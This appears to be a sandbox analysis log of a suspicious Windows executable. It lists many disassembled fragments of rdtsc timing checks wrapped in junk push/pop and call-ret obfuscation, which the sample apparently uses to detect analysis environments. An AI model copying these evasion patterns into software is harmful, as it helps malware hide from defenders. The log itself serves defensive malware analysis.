            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 864777 second address: 86478F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F8408BD9DB1h 0x00000008 pop ebx 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8649E4 second address: 8649F4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F84084B1626h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8649F4 second address: 8649FE instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8408BD9DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8649FE second address: 864A24 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F84084B1638h 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F84084B1626h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 864A24 second address: 864A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 864B78 second address: 864B7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 864CCC second address: 864D24 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8408BD9DA6h 0x00000008 js 00007F8408BD9DA6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jne 00007F8408BD9DAEh 0x00000016 pushad 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 pushad 0x0000001a popad 0x0000001b jl 00007F8408BD9DA6h 0x00000021 popad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F8408BD9DB1h 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F8408BD9DB8h 0x00000031 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 864D24 second address: 864D2A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 864D2A second address: 864D37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F8408BD9DA6h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 864D37 second address: 864D4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F84084B162Ch 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 864EA4 second address: 864EAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 864EAA second address: 864EB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 864EB4 second address: 864EBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 865142 second address: 865147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 865147 second address: 86514D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86514D second address: 865151 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 865151 second address: 865186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F8408BD9DB1h 0x00000010 push edi 0x00000011 pop edi 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 jg 00007F8408BD9DA6h 0x0000001a popad 0x0000001b jl 00007F8408BD9DAEh 0x00000021 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 865775 second address: 865779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 865779 second address: 8657A1 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8408BD9DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e jmp 00007F8408BD9DB7h 0x00000013 push esi 0x00000014 pop esi 0x00000015 pop ebx 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8658E4 second address: 865911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84084B1633h 0x00000009 jo 00007F84084B1626h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jns 00007F84084B162Ah 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 865911 second address: 865916 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83188A second address: 831890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 831890 second address: 8318B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c pushad 0x0000000d jmp 00007F8408BD9DB9h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8318B8 second address: 8318D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84084B162Bh 0x00000009 popad 0x0000000a pushad 0x0000000b jbe 00007F84084B1626h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 865A68 second address: 865A84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8408BD9DB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 865A84 second address: 865A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 865A89 second address: 865A8E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8661EB second address: 866200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 je 00007F84084B162Eh 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 866349 second address: 86636D instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8408BD9DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8408BD9DB8h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8664B8 second address: 8664BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8664BC second address: 8664C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86A4B7 second address: 86A4BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86B30F second address: 86B319 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8408BD9DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8384AE second address: 8384B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 870425 second address: 870429 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 870AF7 second address: 870B00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 870B00 second address: 870B06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 870B06 second address: 870B0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 870C4E second address: 870C52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 870C52 second address: 870C56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 874233 second address: 874237 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8743A7 second address: 8743C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F84084B1635h 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87492F second address: 87494F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8408BD9DB9h 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87494F second address: 874953 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8753B1 second address: 8753B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8753B5 second address: 8753BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8753BB second address: 8753C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8753C1 second address: 8753E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c jmp 00007F84084B1633h 0x00000011 pop ecx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8753E1 second address: 8753E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8753E7 second address: 8753EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8753EB second address: 875440 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8408BD9DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F8408BD9DA8h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 jmp 00007F8408BD9DB9h 0x0000002c clc 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 pushad 0x00000032 popad 0x00000033 pushad 0x00000034 popad 0x00000035 popad 0x00000036 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 875440 second address: 875446 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82AF7A second address: 82AF7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82AF7E second address: 82AF84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82AF84 second address: 82AF8F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jns 00007F8408BD9DA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82AF8F second address: 82AF98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82AF98 second address: 82AF9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 879078 second address: 879082 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F84084B1626h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87A126 second address: 87A12A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87A1D5 second address: 87A1F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F84084B1638h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87B492 second address: 87B4AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8408BD9DB2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87B4AE second address: 87B4B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87B4B3 second address: 87B4B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87B4B9 second address: 87B4BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87B4BD second address: 87B4C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87BFD5 second address: 87BFDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87BFDB second address: 87BFDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87CAC0 second address: 87CACE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84084B162Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87D53D second address: 87D563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F8408BD9DA6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8408BD9DB9h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87D292 second address: 87D2B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F84084B1639h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8801FC second address: 880237 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 adc ebx, 35728C4Dh 0x0000000e movsx edi, dx 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007F8408BD9DA8h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 00000018h 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f clc 0x00000030 push eax 0x00000031 push edi 0x00000032 push ecx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 883278 second address: 88327D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88327D second address: 8832D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8408BD9DB1h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov ebx, ecx 0x0000000f push 00000000h 0x00000011 jmp 00007F8408BD9DAEh 0x00000016 mov bx, si 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ebx 0x0000001e call 00007F8408BD9DA8h 0x00000023 pop ebx 0x00000024 mov dword ptr [esp+04h], ebx 0x00000028 add dword ptr [esp+04h], 00000014h 0x00000030 inc ebx 0x00000031 push ebx 0x00000032 ret 0x00000033 pop ebx 0x00000034 ret 0x00000035 stc 0x00000036 xchg eax, esi 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a jbe 00007F8408BD9DA6h 0x00000040 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8832D4 second address: 8832D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88414D second address: 884157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8851FA second address: 88520D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F84084B162Fh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88520D second address: 885296 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8408BD9DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F8408BD9DA8h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 mov ebx, eax 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push eax 0x00000032 call 00007F8408BD9DA8h 0x00000037 pop eax 0x00000038 mov dword ptr [esp+04h], eax 0x0000003c add dword ptr [esp+04h], 00000019h 0x00000044 inc eax 0x00000045 push eax 0x00000046 ret 0x00000047 pop eax 0x00000048 ret 0x00000049 mov ebx, dword ptr [ebp+12450FE0h] 0x0000004f push ecx 0x00000050 or edi, dword ptr [ebp+122D39E1h] 0x00000056 pop edi 0x00000057 jmp 00007F8408BD9DADh 0x0000005c xchg eax, esi 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007F8408BD9DB1h 0x00000065 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 884432 second address: 88446E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F84084B1633h 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 ja 00007F84084B1628h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F84084B1634h 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88446E second address: 884472 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8854EA second address: 8854EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8862EA second address: 8862EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8862EE second address: 8862F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8862F8 second address: 88635D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8408BD9DADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F8408BD9DA8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 push 00000000h 0x00000029 mov bx, 97D9h 0x0000002d jl 00007F8408BD9DA8h 0x00000033 mov bh, al 0x00000035 push 00000000h 0x00000037 jmp 00007F8408BD9DACh 0x0000003c xchg eax, esi 0x0000003d jo 00007F8408BD9DAEh 0x00000043 jnc 00007F8408BD9DA8h 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c push ecx 0x0000004d push edi 0x0000004e pop edi 0x0000004f pop ecx 0x00000050 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 887475 second address: 88747F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F84084B1626h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88A49D second address: 88A4B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8408BD9DB7h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88A4B8 second address: 88A4BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88A4BC second address: 88A539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jno 00007F8408BD9DA6h 0x00000011 jmp 00007F8408BD9DAAh 0x00000016 popad 0x00000017 pushad 0x00000018 jnp 00007F8408BD9DA6h 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 popad 0x00000022 nop 0x00000023 push 00000000h 0x00000025 push ebp 0x00000026 call 00007F8408BD9DA8h 0x0000002b pop ebp 0x0000002c mov dword ptr [esp+04h], ebp 0x00000030 add dword ptr [esp+04h], 00000018h 0x00000038 inc ebp 0x00000039 push ebp 0x0000003a ret 0x0000003b pop ebp 0x0000003c ret 0x0000003d mov edi, 4AD62FF4h 0x00000042 push 00000000h 0x00000044 mov edi, dword ptr [ebp+122D3C49h] 0x0000004a push 00000000h 0x0000004c mov edi, dword ptr [ebp+12459002h] 0x00000052 mov di, bx 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007F8408BD9DB9h 0x0000005e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88B36E second address: 88B374 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88B3FF second address: 88B409 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8408BD9DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
